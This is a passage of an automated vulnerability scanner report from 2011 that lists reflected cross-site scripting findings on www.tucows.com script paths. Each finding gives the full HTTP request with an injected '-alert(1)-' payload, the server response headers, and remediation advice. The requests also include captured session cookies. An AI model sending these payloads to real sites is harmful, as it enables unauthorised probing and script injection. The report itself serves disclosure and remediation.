<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1d9"-alert(1)-"aaec46b7783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d85f"-alert(1)-"b501c96f23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:52 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a50d"-alert(1)-"addf45cb35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.54. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/x_core.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77ea"-alert(1)-"c2c5c57e4b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52264"-alert(1)-"ba7b1f5ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83368"-alert(1)-"1009c251c75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:49 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d685f"-alert(1)-"468f4a77932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5e35"-alert(1)-"277a1eb2d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b699"-alert(1)-"96b8d0b02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.60. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/xdocsize.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5207"-alert(1)-"8d2e3d0b84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3505f"-alert(1)-"50098cc31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c7b"-alert(1)-"983752aa4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dce"-alert(1)-"df3be201d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesb3dce"-alert(1)-"df3be201d5f/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
